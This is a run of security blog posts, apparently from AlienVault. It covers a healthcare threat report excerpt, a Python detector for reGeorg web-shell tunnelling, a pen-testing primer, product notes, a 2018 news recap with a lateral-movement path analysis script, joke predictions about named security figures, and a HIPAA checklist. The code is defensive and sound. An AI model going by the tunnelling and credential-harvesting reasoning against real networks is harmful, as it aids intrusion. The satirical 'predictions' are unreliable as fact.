How to learn more: Network health: advanced cyber threats to the medical and life sciences industries; Tropic Trooper's new strategy; Intrusions affecting multiple victims across multiple sectors; Wekby attacks use DNS for C2; Indian organizations targeted in Suckfly attacks; Black Vine: formidable cyberespionage group.
Want more information? There are a number of organizations, such as the Health ISAC (H-ISAC), that can provide additional information on threats seen within the healthcare sector. For any queries regarding this report, please contact email@example.com.
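The ReGeorg step in the SamSam playbook above leaves a trace in the web server's own access log, even though the tunnel's commands travel in request headers or parameters the log does not record: one client hitting one server-side script at a cadence no browsing session produces. The following Python is an added example, not AlienVault's code or a published detection: a sliding-window heuristic over combined-format access logs. The 60-second window, the threshold of 50 requests, the list of script extensions, and every log line are constructed assumptions, and the threshold needs tuning against your own traffic before it drives an alert.

```python
"""Added example, not from the original post or AlienVault: a cadence-based
heuristic for reGeorg-style HTTP tunnelling in web-server access logs.  The
tunnel's commands ride in headers or parameters a standard access log does
not record, so this looks only at behaviour: one client driving one
server-side script at a rate no browsing session produces.  The window,
threshold, script extensions and every log line are constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format; IIS W3C logs would need a different regex.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Server-side handlers a dropped tunnel script would typically use (assumption).
SCRIPT_EXT = (".jsp", ".jspx", ".aspx", ".ashx", ".asmx", ".php")


def parse_access_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "client": m["client"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["target"].split("?", 1)[0],  # drop the query string
        "status": int(m["status"]),
    }


def find_tunnel_candidates(lines, window=timedelta(seconds=60), threshold=50):
    """Flag (client, script path) pairs that exceed `threshold` requests inside
    any `window`-long span.  Static assets are ignored: a busy image is normal,
    a .jsp hit hundreds of times by one client is not."""
    buckets = defaultdict(list)
    for line in lines:
        ev = parse_access_line(line)
        if ev and ev["path"].lower().endswith(SCRIPT_EXT):
            buckets[(ev["client"], ev["path"])].append(ev)

    findings = []
    for (client, path), events in buckets.items():
        events.sort(key=lambda e: e["ts"])
        start, peak = 0, 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end]["ts"] - events[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            posts = sum(1 for e in events if e["method"] == "POST")
            findings.append({
                "client": client,
                "path": path,
                "peak_per_window": peak,
                "post_ratio": round(posts / len(events), 2),
            })
    return findings


def build_sample_log():
    """Constructed access log: an ordinary browsing session, a frequently
    fetched static asset, and one client driving a tunnel script at two
    requests per second with alternating POST (send) and GET (read) calls."""
    t0 = datetime(2019, 2, 1, 10, 0, 0, tzinfo=timezone.utc)

    def fmt(client, t, method, target):
        stamp = t.strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{client} - - [{stamp}] "{method} {target} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

    lines = []
    for i in range(6):    # a user opening a page every ten seconds
        lines.append(fmt("10.1.4.22", t0 + timedelta(seconds=10 * i), "GET", f"/app/page{i}.jsp"))
    for i in range(80):   # busy static asset: high rate, but not a script
        lines.append(fmt("10.1.4.23", t0 + timedelta(seconds=i), "GET", "/img/logo.png"))
    for i in range(120):  # tunnel client: 120 requests to one script in 60 seconds
        lines.append(fmt("203.0.113.50", t0 + timedelta(milliseconds=500 * i),
                         "POST" if i % 2 else "GET", "/uploads/tunnel.jsp?x=1"))
    return lines


if __name__ == "__main__":
    for finding in find_tunnel_candidates(build_sample_log()):
        print(finding)
```

A finding is a lead, not a verdict: confirm it by checking whether the script path was recently created in the web root and whether the client is an unexpected external address, which together match the web shell plus tunnel pattern listed above.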
What is Penetration Testing?

Penetration testing, often called “pen testing”, is one of several techniques used to verify cybersecurity posture and provide a level of assurance to the organization that its cyber defenses are functional. It’s a way of testing defenses against an adversary who mimics a cyber-criminal actor.

First Rule of Network Penetration Testing: Make sure you have a signed contract to perform the services of a pen tester, including a statement of work and a detailed scope for the engagement. Failure to follow this advice could result in civil and/or criminal legal action being taken against you.

It should be noted that many compliance and regulatory requirements, including the General Data Protection Regulation (GDPR), require an organization to undertake regular testing to evaluate the effectiveness of organizational security controls. It stands to reason that the further an adversary can penetrate into your organization and retrieve sensitive and/or confidential information, the more evident the business case for improving your cyber security posture becomes.

The technique of cyber security pen testing is not without controversy. Detractors of pen testing as a cybersecurity test point out that the techniques used by professional pen testers are generally reserved for sophisticated cyber criminals or nation state actors. The argument, then, is that pen testing does not mimic the “every day” cybersecurity threat the organization faces given its level of risk tolerance. Although that argument runs right up against the evolution and increasing sophistication of cyber-criminal attacks, an organization may not have the financial or IT resources to deal with the outcomes or recommendations of the pen test. In fact, a pen test can be a demoralizing experience for the organization’s already stressed IT resources and may document risks the organization would rather not have illuminated.

Simply put, a pen test requires a basic level of cyber hygiene and organizational readiness – there has to be organizational will to mitigate the “findings” of the pen test. If the organization has not instituted basic cyber security controls as prescribed by UK Cyber Security Essentials or the CIS top five security controls, then money invested in a pen test may be quite wasteful. In short, if the organization has not:

1. Secured the internet connection with a firewall
2. Secured organizational devices and software
3. Controlled access to organizational data and services
4. Protected organizational endpoints from viruses and other malware
5. Made sure organizational devices and software are up to date

then the pen test will not go well for your organization and an adversary will have a field day.

Penetration Testing Tools

There is a myriad of pen testing tools available, the majority being open source. The profession of pen tester is linked to professional certifications such as Certified Ethical Hacker, CompTIA PenTest+ and Offensive Security Certified Professional (OSCP), and an extensive SANS curriculum built around pen testing and the use of popular tools is available. Here is a list of common pen testing tools (OK, my favorite tools!) that pen testers will unleash on an organization. Many folks in the business of professional pen testing have their own preferences, and professional software is also available.

Common Network Penetration Testing Tools

- Nmap – Free! Network scanner and enumerator, supported by a massive community and extensible with a great deal of scripting capability.
- The Metasploit Framework, available on Kali Linux – Free! Many special purpose pen testing tools, password crackers as well as wireless security tools. I would say this is an accepted industry standard.
- ZAP – Free! An older attack proxy framework used to evaluate website and web application security. I like it and find it easy to use, as I am not skilled enough to use something like Burp Suite against a website.
- Nessus – Not free. This software does require professional licensing to use as a professional pen tester, but it is an excellent vulnerability scanner. (Another one I recommend is Outpost 24.)
- Maltego Community Edition – Free! This does not do any pen testing, but it is my go-to documentation tool for network mapping and domain enumeration. Mostly a cyber threat intel platform, but for making the pretty pictures it’s a lot more automated than Microsoft Visio.

As a professional pen tester you are only as good as your Google-Fu. Depending on the nature of your engagement, websites like Shodan, ExploitDB, or even searching for “Default Password for <insert make> <model number> device” will yield sources of information which may prove useful. It’s also surprising how frequently reverse IP lookups and domain name registration information are necessary to conduct the pen test.

Website Penetration Testing

This is really a subset of network penetration testing and is firmly (at least in my opinion) in the realm of software developer meets adversary. Websites are complex layers of software which usually connect to a “back-end” database. The database is potentially filled with customer or employee information which a cyber-criminal would like to steal and sell and/or destroy with ransomware. Thousands of hours of developer time may have gone into the creation of customer-facing websites, and they may even have access to credit card payment information. No matter what the database contains, it needs to be defended, and there are any number of techniques by which a cyber-criminal can gain unauthorized access. Although a scanner like Burp Suite or ZAP can detect many of the OWASP Top 10 common vulnerabilities, a skilled web application pen tester can target the website’s API(s) to perhaps coax information from the site which should not be revealed. Because websites are intensely linked to the organization’s online brand and may be a primary source of revenue, many organizations insist on a web application pen test before a site goes live.

Penetration Testing Report

In most cases this is called the “dreaded” pen testing report. For most organizations who thought they had a decent security posture, this report usually suggests a lot more can or needs to be done. What makes for a good report is a list of the most impactful, readily achievable, and least expensive to implement solutions to the discovered shortcomings. The best pen test report also identifies items which the organization is doing well, in addition to items the organization needs to improve upon, to allow for some solace as the mountain of work to do is revealed.

One of the most powerful metrics, and a significant boost to organizational compliance, is to use the pen test report as a road map for key IT projects and process or technology implementations in the next year. The first pen test the organization receives sets the need for future improvement. The second pen test report should show measurable improvements. If there has been no improvement between the two, it may be time to consider a radical course of improvement before your organization is targeted by a real cyber-criminal adversary.
At AWS re:Invent recently, I spoke to several booth visitors who asked, “What’s new with AlienVault?” It was exciting to talk through some of the improvements we’ve made over the last year and see their eyes widen as the list went on. As our customers know, we regularly introduce new features to USM Anywhere and USM Central to help teams detect and respond to the latest threats. You can keep up with our regular product releases by reading the release notes in the AlienVault Product Forum. Let’s take a look at the highlights from our October and November releases:

Mac OS Support for the AlienVault Agent

In July, we announced the addition of endpoint detection and response (EDR) capabilities to USM Anywhere, enabled by the AlienVault Agent. The AlienVault Agent is an osquery-based endpoint agent that provides system-level security, including file integrity monitoring and host intrusion detection (HIDS). Over the last few months, we’ve listened carefully to customer input to guide our continued improvement of the AlienVault Agent, leading us to improve filtering rules for better control over data consumption and make a number of additional enhancements. In November, we addressed a top customer request with the addition of Mac OS support for the AlienVault Agent. Now, USM Anywhere customers can use the AlienVault Agent for continuous threat detection and file integrity monitoring (FIM) on their Linux, Windows, and Mac hosts.

AlienVault Agent Queries as Response Actions

USM Anywhere accelerates incident response with the ability to orchestrate response actions directly from an alarm. With just a few clicks, you can take an immediate, one-time action or create a rule to make sure that action happens automatically going forward. (Check out examples of automated incident response in action in this blog post.) To enhance your ability to respond swiftly and efficiently to potential threats, we’ve added a new response action to trigger AlienVault Agent queries. Like our other response actions, you can find this option directly from the detail view of an alarm or as part of an orchestration rule.

Launch AlienVault Agent Queries from the Agents Page

In addition to the response action listed above, you can now trigger AlienVault Agent queries from the Agents page by clicking the “Run Agent Query” button. You can run queries against a single asset or all assets that have the AlienVault Agent installed.

Asset Group Enhancements for the AlienVault Agent

Asset Groups help USM Anywhere users group similar assets for specific purposes. For example, you might want to assign assets to the PCI DSS asset group to keep track of the assets in scope of your CDE. We’ve added a new “Assets with Agents” dynamic asset group containing all assets that have the AlienVault Agent deployed. We’ve also expanded asset group functionality by adding the ability to assign AlienVault Agent profiles to asset groups. You can do this by selecting the “Assign Agent Profile” option from the Actions menu for a specific asset group.

Improved Ability to View Suppressed Alarms

We’ve improved the filtering options available on the Alarms page to support the display of only suppressed alarms. This change has no effect on the default Alarms view, which does not include suppressed alarms.

Certificate Upload for TLS-Encrypted Syslog

In addition to the digital certificate provided through USM Anywhere, customers can now upload their own server certificate and CA certificate to enable the SSL connection for TLS-encrypted syslog transport. Certificates can be uploaded from a new Settings tab in the Syslog App configuration page located at Data
It’s hard to believe the whole year has gone past and I’ve been hearting things nearly every week since it began. I’d like to sum up 2018, so I started to look through all the posts from every week and I realised it was a mammoth task. There have been 40 “Things I hearted” blog posts this year, each with an average of 10 stories. And that doesn’t include the dozens of other stories that didn’t make the cut every week. Suffice to say, it’s been a very busy year as far as information security is concerned. Which could mean that business is very good. Or it could just mean that business is as usual, and we’re just getting better at covering the stories.

In YouTube fashion, I decided to do a video rewind of some of the notable stories of the year (minus Will Smith and the big budget). Conspiracy videos aside, let’s have a recap of an assortment of stories that were hearted over the course of the year.

January 12th Edition

Toy Firm VTech Fined Over Data Breach
VTech, the ‘smart’ toy manufacturer, has been fined $650,000 by the FTC after exposing the data of millions of parents and children. Troy Hunt brought up the issue back in November 2015 and it made for a chilling read. Not only was the website not secure, but the data was not encrypted in transit or at rest. Hopefully, this kind of crackdown on weak ‘smart’ devices will continue until we see some changes. Not that I enjoy seeing companies being fined, but it doesn’t seem like many manufacturers are paying much attention to security.
- FTC fines VTech toy firm over data breach | SC Magazine
- FTC Fines IoT Toy Vendor VTech for Privacy Breach | eWeek
- After breach exposing millions of parents and kids, toymaker VTech handed a $650K fine by FTC | Techcrunch

March 9th Edition

SAML, SSO Many Vulnerabilities
SAML-based single sign-on systems have some vulnerabilities that allow attackers with authenticated access to trick SAML systems into authenticating as different users without knowledge of the victims’ password. Sounds like a lot of fun.
- Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | DUO

March 30th Edition

Investigating Lateral Movement Paths with ATA
Even when you do your best to protect your sensitive users, and your admins have complex passwords that they change frequently, their machines are hardened, and their data is stored securely, attackers can still use lateral movement paths to access sensitive accounts. In lateral movement attacks, the attacker takes advantage of instances when sensitive users log into a machine where a non-sensitive user has local rights. Attackers can then move laterally, accessing the less sensitive user and then moving across the computer to gain credentials for the sensitive user.
- Investigating lateral movement paths with ATA | Microsoft

May 18th Edition

Hacking the Hackers
A hacker has breached Securus, the company that helps cops track phones across the US. You'd think that if you were a company that collected all sorts of phone data and location tracking, and worked with law enforcement, you'd be a bit more careful in how you store the data. Last week, the New York Times reported that Securus obtains phone location data from major telcos, such as AT&T, Sprint, T-Mobile, and Verizon, and then makes this available to its customers. The system by which Securus obtains the data is typically used by marketers, but Securus provides a product for law enforcement to track phones in the US nationwide with little legal oversight, the report adds. In one case, a former sheriff of Mississippi County, Mo., used the Securus service to track other law enforcement officials’ phones, according to court records.
- Hacker breaches Securus, the company that helps cops track phones across the US | Motherboard
- Service meant to monitor inmates' calls could track you, too. | NYTimes

June 1st Edition

Your Data
Looking at your data this week, Brian Krebs flips the lid on why your location data is no longer private.

"The past month has seen one blockbuster revelation after another about how our mobile phone and broadband providers have been leaking highly sensitive customer information, including real-time location data and customer account details. In the wake of these consumer privacy debacles, many are left wondering who’s responsible for policing these industries? How exactly did we get to this point? What prospects are there for changes to address this national privacy crisis at the legislative and regulatory levels?"
- Why Is Your Location Data No Longer Private? | Krebs On Security

But wait, there's a plot twist. Tired of all these companies profiting off your data? Well, maybe you can try what this guy did and make some money yourself by directly selling your data.
- This Guy Is Selling All His Facebook Data on eBay | Motherboard

July 6th Edition

10 Things To Know Before Getting Into Cybersecurity
You may know Kevin Beaumont as @GossiTheDog on Twitter. He won the 2018 EU blogger awards for best tweeter. But apparently he's a man of more talents than just twits; he also blogs, and has put together a good list of 10 things you should know if you're considering getting into cybersecurity.
- 10 things to know before getting into cyber security | Double Pulsar

Related, if you're looking to break into security, then you'll want to know which locations offer the best salaries (US-based).
- Cybersecurity spotlight 2018: Where are the highest paying jobs? | Indeed Blog

August 31st Edition

Probably The Best Tech Keynote in the World
I’ll be honest, up until a couple of weeks ago I hadn’t heard of James Mickens, who is a professor at Harvard University. I watched his keynote presentation at Usenix, and haven’t been this entertained and captivated by a technology talk in … well, never. It’s well worth carving 50 minutes out of your day to watch his keynote entitled, “Q: Why Do Keynote Speakers Keep Suggesting That Improving Security Is Possible? A: Because Keynote Speakers Make Bad Life Decisions and Are Poor Role Models”.

October 5th Edition

Bupa Fined £175k
International health insurance business Bupa has been fined £175,000 after a staffer tried to sell more than half a million customers' personal information on the dark web. The miscreant was able to access Bupa's CRM system SWAN, which holds records on 1.5 million people, and generate and send bulk data reports on 547,000 Bupa Global customers to his personal email account. The information – which included names, dates of birth, email addresses, nationalities and administrative info on the policy, but not medical details – was then found for sale on AlphaBay Market before it was shut down last year.
- Health insurer Bupa fined £175k after staffer tried to sell customer data on dark web souk | The Register

November 30th Edition

The $1M SIM Swap
A 21-year-old has been accused of SIM-swapping the mobile number of a Silicon Valley executive in order to steal roughly $1 million in cryptocurrency.
- SIM-swapping 21-year-old scores $1 million by hijacking a phone | ZDNet
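To make the lateral movement paths item from the March 30th edition concrete, here is an added example (my own illustration for this page, not code from the post or from Microsoft ATA) that models local admin rights and logon sessions as a graph, finds the chain from an ordinary account to a sensitive one, and lists the hosts a defender should fix first. All host and account names are constructed sample data.

```python
"""Lateral movement path analysis (added example; not from the post or from ATA).

Models the situation described in the March 30th item: a sensitive account has a
logon session on a machine where a non-sensitive account holds local admin rights,
so whoever controls that account can harvest the sensitive credential there.
All hosts and account names below are constructed sample data, not real inventory.
"""
from collections import deque

# Constructed: accounts that hold local admin rights on each host.
LOCAL_ADMINS = {
    "WS01": {"alice", "helpdesk"},
    "WS02": {"bob", "helpdesk"},
    "SRV-FILE": {"srvadmin"},
    "DC01": {"domainadmin"},
}

# Constructed: recent interactive logon sessions per account (the data ATA collects).
SESSIONS = {
    "alice": {"WS01"},
    "bob": {"WS02"},
    "helpdesk": {"WS01", "WS02"},
    "srvadmin": {"WS02", "SRV-FILE"},      # server admin also logs on to a workstation
    "domainadmin": {"SRV-FILE", "DC01"},   # sensitive account has a session on a member server
}

# Constructed: the accounts we consider sensitive.
SENSITIVE = {"domainadmin"}


def build_graph(local_admins, sessions):
    """Directed graph: account -> set of accounts it can take over.

    A controls B when A is local admin on a host where B has a session, because
    local admin can read B's credential material from that host's memory.
    """
    graph = {}
    for host, admins in local_admins.items():
        exposed = {acct for acct, hosts in sessions.items() if host in hosts}
        for admin in admins:
            graph.setdefault(admin, set()).update(exposed - {admin})
    return graph


def lateral_paths(start, graph, sensitive, max_depth=6):
    """Breadth-first search from a compromised account to every sensitive account.

    Returns simple paths (no repeated accounts) as lists of account names, shortest
    first; paths with more than max_depth hops are not explored.
    """
    paths = []
    queue = deque([[start]])
    while queue:
        path = queue.popleft()
        if len(path) - 1 >= max_depth:
            continue
        for nxt in sorted(graph.get(path[-1], ())):
            if nxt in path:
                continue
            candidate = path + [nxt]
            if nxt in sensitive:
                paths.append(candidate)
            else:
                queue.append(candidate)
    return paths


def risky_hosts(local_admins, sessions, sensitive):
    """Hosts where a sensitive account has a session but a non-sensitive account is
    local admin. These are the remediation targets: remove the admin right, or stop
    the sensitive account from logging on to that host."""
    risky = {}
    for host, admins in local_admins.items():
        sensitive_here = {acct for acct in sensitive if host in sessions.get(acct, ())}
        non_sensitive_admins = admins - sensitive
        if sensitive_here and non_sensitive_admins:
            risky[host] = sorted(non_sensitive_admins)
    return risky


if __name__ == "__main__":
    g = build_graph(LOCAL_ADMINS, SESSIONS)
    for p in lateral_paths("alice", g, SENSITIVE):
        print(" -> ".join(p))
    print("Fix first:", risky_hosts(LOCAL_ADMINS, SESSIONS, SENSITIVE))
```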
It’s December, which means it’s time to get those 2019 cyber predictions going. While there are many well-informed, and some not-so-well-informed, opinions out there, I’ve dug through the cyber underground, I’ve climbed data mountains, and delved to the depths of the dark web to seek out what is really happening. Having spilt coffee, Red Bull, and tears, I am proud to present the soft underbelly of the cyber security industry, and what the future will hold. You’re welcome.

- Jayson Street will be exposed as a secret agent charged with obtaining DNA samples of as many hackers as possible. Close inspection will reveal Jayson stealing a strand of hair every time he offers an “awkward hug”. Having been outed, he will go on to start a podcast called “The word on the Street”.
- HaveIBeenPwned will be purchased by FireEye. Troy Hunt will take the money and move to New Zealand, where he’ll set up another website called “YesYouArePwned” with Kim dot com.
- Bug bounty and vulnerability disclosure pioneer Katie Moussouris will have no less than 10 instances a month of bug bounties being mansplained to her. At least 2 a month will try to prove her wrong by citing papers, without realising she authored them.
- Richard Bejtlich will tell the world how it’s actually Papua New Guinea that is responsible for the majority of APTs. He’ll admit that China was initially blamed as an internal joke that went a bit too far.
- Jeff Moss will look in disgust at what he has created. In a fit of rage he’ll punch the ground and pull his hair, yelling, “I’ve created a monster!” and cancel DEF CON. This will create a domino effect as all other conferences come collapsing, leaving no security conferences active by the end of the year.
- SwiftOnSecurity is unmasked as being The Grugq, who would have gotten away with it if it weren’t for those meddling kids.
- Stuck-in-traffic YouTuber Wolf Goerlich will finally take a different route into work and realise traffic ain’t all that bad. As a result YouTube suspends his account, declaring the title misleading. Which is a polite way of saying ‘fake news’.
- Investigative journalist Brian Krebs may unofficially be many companies' IDS, but in 2019 he’ll take it to new heights by launching his own subscription-only service called B-KIDS (Brian Krebs IDS), which companies can use to get the heads up if they’re going to be outed.
- Reunions will become common, as professionals grow bored of corporate life. L0pht Hacking Industries will furiously lobby the US government, while over in Europe the Eurotrash Security podcast will regroup and take the show on the road once again.
- Marcus Hutchins reveals he was never really arrested by the FBI. Claims he just wanted a bit of “me time” and thought this would be the best way.
- (ISC)2 will cease offering the CISSP certification, stating that there is now a global surplus of security professionals and the number needs to be reduced.
- Independent analyst Kelly Shortridge reveals the magic that goes into magic quadrants, waves and other analyst firms’ methodologies. Confidence in analyst firms will take a dip as a result. Kelly will then sell the rights to the movie, The Big Short(ridge).
- Award-winning blogger and podcaster Graham Cluley will go through the whole of 2019 without winning a single award.
- Mega breaches will have reached the tipping point and GDPR will have been found ineffective. In a last-ditch effort, offering affected customers a year's credit monitoring will no longer be deemed sufficient. Rather, companies will be forced to create whole new identities for affected individuals, complete with backstories, like witness protection programs do.
- Finally, world governments will see the error of their ways and stop trying to backdoor crypto.

Have a happy 2019 folks!
Let’s face it, managing cyber risk and compliance is hard. Many organizations struggle to gain the visibility needed to truly understand their overall cyber risks. They also struggle to maintain that visibility as they take on digital business transformation and new cloud computing initiatives. It’s no easy task for organizations to continually align their security priorities to changes in the regulatory landscape, their IT environment, and an always-shifting threat landscape, especially for organizations with limited IT resources.

That’s why we are excited to announce a new solution to help organizations of any size reduce their cyber risks and simplify their journey toward compliance. Together, AT&T Cybersecurity Consulting and AlienVault, an AT&T Company, are bringing together the people, process, and technology in one unified solution to help organizations improve cyber risk and compliance management. In doing so, we’re making it simple and fast for organizations to consolidate their requirements and to accelerate their security and compliance goals. Download the solution brief to learn more.

“Managing cyber risk and compliance requires an ongoing review of your IT assets and data, security practices, and personnel — and no single security tool provides that holistic visibility,” said Russell Spitler, SVP of Product for AlienVault, an AT&T company. “With a unified solution from AT&T Cybersecurity Consulting and AlienVault, we can help organizations to reduce the complexity and cost of having to juggle multiple products and vendors.”

This solution addresses many of the most challenging aspects of meaningful risk reduction (i.e. actually making progress in reducing risks, not simply “managing risks”) and maintaining continuous compliance. The solution includes: risk assessment, vulnerability assessment with scanning and remediation, employee cybersecurity awareness training, continuous network monitoring for the latest threats, and reporting for compliance as well as for internal policy. It is ideal for organizations that are getting started with or want to accelerate their efforts for PCI DSS or HIPAA, but also for organizations without a compliance mandate that are looking to evaluate and improve their cyber risk posture quickly and efficiently.

Unlike other solutions for cyber risk and compliance that are often oversized and do not adapt to an organization’s existing security model, AlienVault and AT&T Cybersecurity Consulting offer flexible options that allow any organization to tailor-fit a solution to their unique environment, business goals, and budget. The solution includes:
- Risk-based Cyber Posture Assessment led by AT&T Cybersecurity Consultants
- ASV-provided External Vulnerability Scanning Services from AT&T Consulting Services
- AlienVault USM Anywhere - a unified platform for threat detection and response
- AT&T Cybersecurity IQ Training - cybersecurity user training and assessments

For more details on the products and services included in this solution, read the solution brief.

Following AT&T Business’ acquisition of AlienVault in August, this offering is the first to combine the phenomenal threat detection and incident response capabilities of AlienVault USM Anywhere and AlienVault Labs Threat Intelligence with the world-class expertise of AT&T Cybersecurity Consulting.

“It’s no secret that cybercrime has become its own industry, giving criminals access to a battery of tools for targeting victims,” said Marcus Bragg, Chief Operating Officer of AlienVault. “For the IT and security professionals who are defending against this, point solutions are no longer enough. They need all the support they can get, and that means people, process, and technology — access to security experts who can share their knowledge and experience, recommendations for best practices, and a unified platform that ties everything together, including the most up-to-date threat intelligence for threat detection and response. That’s what the future looks like in our fight against cybercrime.”

This solution is available from AlienVault and AT&T Business, so new and current customers can easily purchase the solution that works for them. To learn more about this and other cybersecurity solutions from AlienVault and AT&T, contact us to get started. To learn more about the offering, download the solution brief.
Five steps to ensuring the protection of patient data and ongoing risk management. Maintaining security and compliance with HIPAA, the Health Insurance Portability and Accountability Act, is growing ever more challenging. The networks that house protected health information (PHI or ePHI) are becoming larger and more complex — especially as organizations move data to the cloud. At the same time, security professionals are faced with an evolving threat landscape of increasingly sophisticated threat actors and methods of attack. For example, 2018 threat intelligence research by AlienVault Labs reports a rise in the number of targeted ransomware attacks in the healthcare sector. These attacks are often backed by organized criminals who see opportunities for making money from health care providers and other similar entities who must protect and keep assets, systems, and networks continuously operating. One such criminal group operating the SamSam ransomware is thought to have earned more than $5 million dollars by manually compromising critical healthcare networks. And, according to AlienVault Labs, the methods used by SamSam are more akin to a targeted attack than typical opportunistic ransomware. To help address these security challenges and ensure adherence to compliance mandates, security and IT professionals should consider how people, processes, and technology can be used together to create a holistic IT security compliance program that simplifies preparation, auditing and reporting, as well as ongoing security risk management and breach monitoring and response. Here’s a five-step HIPAA compliance checklist to get started. Certification and Ongoing HIPAA Compliance HIPAA sets the standard for protecting sensitive patient data. Any entity that deals with protected health information must ensure that all the required physical, network, and process security measures are in place and followed. 
In 2009, the Health Information Technology for Economic and Clinical Health (HITECH) Act was adopted to promote the “meaningful use of health information technology” and address the privacy and security concerns associated with the electronic transmission of health information. Although there is no standard or implementation specification that requires a covered entity to “certify” compliance, the evaluation standard § 164.308(a)(8) requires covered entities to perform ongoing technical and non-technical evaluations that establish the extent to which their security policies and procedures meet the security requirements. Evaluations can be performed and documented internally or by an external organization that provides evaluation or “certification” services. However, HITECH requires the HHS Office for Civil Rights (OCR) to conduct periodic audits of covered entities and business associates for compliance with the HIPAA Privacy, Security, and Breach Notification Rules. Step 1: Start with a comprehensive risk assessment and gap analysis Your compliance strategy should start with a solid foundation, which is why the first step in your journey to HIPAA compliance should be a readiness assessment that includes a comprehensive risk and compliance analysis of your electronic health record (EHR) environment. This assessment is often best done by a third party with expertise in healthcare security and compliance, as HIPAA regulations can be confusing and cumbersome. Using a third party with the necessary expertise will ensure you don’t miss or misunderstand the required regulations, and it will save you time as they will likely have a HIPAA checklist to reference. Your consultant can perform an initial evaluation of your entire security program to determine its adherence to HIPAA regulations and the level of readiness to proceed with the “certification” process. 
It’s worth noting that the OCR does not actually “certify” HIPAA compliance (see side bar), however there are organizations outside of the OCR that do provide “certification” services, and many organizations take advantage of these certification services to prove compliance. As a result of the evaluation, your consultant should provide a comprehensive report that may include such things as: Your organization’s current security and compliance posture compared to the requirements established by the OCR Audit Protocol (including the HIPAA Privacy Rule, Security Rule and the Breach Notification Rule). Prioritized recommendations for risk remediation. A road map outlining the steps and initiatives to achieve compliance and “certification”. According to the OCR, organizations that have aligned their security programs to the National Institute for Standards and Technology (NIST) Cybersecurity Framework may find it helpful as a starting place to identify potential gaps in their compliance with the HIPAA Security Rule. Addressing these gaps can bolster compliance with the Security Rule and improve the organization’s ability to secure ePHI and other critical information and business processes. Read how NIST “maps” to the HIPAA Security Rule in the HIPAA Security Rule Crosswalk to NIST Cybersecurity Framework. Step 2: Remediate identified risks and address compliance gaps Once you’ve identified your organization’s risks, take immediate steps to address the gaps within your security program. Again, a consultant who has practical experience in healthcare security will be very useful in providing strategic guidance, as well as advice on risk mitigation. Many organizations use the same consultant who performed their initial risk assessment. Your consultant may develop specific programs, policies, standards, and procedures, as well as support or help implement key security practices and controls. 
For example, they may assist in prioritizing vulnerabilities and make recommendations for remediation in your EHR environment. Or, they may provide pre-packaged employee security awareness training that meets HIPAA guidelines, such as educating employees on security risks and running them through attack scenarios. Make use of security technology to help you more quickly address the gaps in your compliance program — and consider platforms versus point solutions, giving you the ability to address multiple issues at once. Also, look for solutions that address both on-premises and multi-cloud environments as HIPAA regulations apply to both (see Guidance on HIPAA & Cloud Computing). For example, look for such use cases as the automation of asset discovery and the ability to categorize those assets into HIPAA groups for easy management and reporting. Those same solutions may also perform vulnerability assessments, automate the prioritization of vulnerabilities for mitigation, and integrate with ticketing solutions to ensure the most critical are being remediated while overall risks are mitigated. Step 3: Take advantage of automated compliance reporting The evaluation standard of HIPAA requires covered entities to perform and document ongoing technical and non-technical evaluations to establish the extent to which their security policies and procedures meet the security requirements. Simplify and speed this process by taking advantage of automated compliance reporting. Look for solutions with predefined report templates for HIPAA, as well as other key regulations such as PCI DSS, NIST CSF, and ISO 27001. Consider ease-of-use, such as being able to define groups of assets — for example, a HIPAA group that includes sensitive assets connected to patient data or protected data. How easy it is to view, export, and customize the reports? What percentage of regulation coverage is included in predefined reporting? 
Most solutions do not cover all the requirements defined by the HIPAA Audit Protocol, but they will give you a jump on your HIPAA checklist. Many security management platforms also include additional predefined event reports, such as reports by data source and data source type, helping to make daily compliance monitoring and reporting activities more efficient. Also, look for an intuitive and flexible interface that allows you to quickly search and analyze your security data, as well as the ability to create and save custom views and export them as executive-ready reports. Finally, solutions that provide centralized visibility of your cloud and on-premises assets, vulnerabilities, threats, and log data from firewalls and other security tools are key to giving you the most complete and contextual data set for maintaining and documenting continuous compliance.

Step 4: Implement Monitoring and Breach Notification Protocols

The Breach Notification Rule, 45 CFR §§ 164.400-414, requires HIPAA covered entities and business associates to provide notifications if they experience a breach that involves unsecured protected health information. Security management platforms can help to simplify and automate monitoring for breaches on your network, ensuring you are able to more quickly detect and contain a breach, as well as provide the required notifications. As more organizations in healthcare are migrating data and applications to the cloud, make sure the technology you’re choosing offers advanced threat detection across both on-premises and multi-cloud environments. Simplify compliance management by choosing a solution that combines an array of essential security capabilities in one platform. These may include, but are not limited to: asset discovery, vulnerability assessment, intrusion detection, behavioral monitoring, endpoint detection and response, SIEM event correlation, file integrity monitoring (FIM), and log management.
By combining these use cases in a single dashboard, you are better able to quickly identify, analyze, and respond to emerging threats that target your EHR environment. Intelligence is key to threat detection and incident response, so consider vendors who have in-house research teams as well as access to external threat intelligence communities and other sources that can provide insight into the latest global threats and vulnerabilities — and in particular, those that are specific to healthcare. However, intelligence without context will create a lot of distracting “noise” for your team. So, check that the solution goes beyond just providing intelligence to incorporating it directly into your dashboard, including providing recommendations on how to respond to identified threats. With this intelligence and guidance at your fingertips, you can react quickly to the latest tactics, techniques, and procedures used by threat actors. And, you are assured of an always-up-to-date and optimally performing security monitoring solution. Need more info on how to respond to a breach? See the HHS Quick Response Checklist.

Step 5: Continuously evaluate and manage risk

Whether you are managing ongoing HIPAA compliance internally or are using an external organization, avoid last-minute scrambling for annual evaluations and audits by employing a year-round risk management program. Such a program requires having real-time visibility of your environment, including system component installations, changes in network topology, firewall information, and product upgrades. Use a unified platform to gain this visibility and enable monitoring in a central location (as opposed to various point solutions).
Here are a few examples of where a platform would be helpful for continuous risk and compliance management:

Manage assets and risks
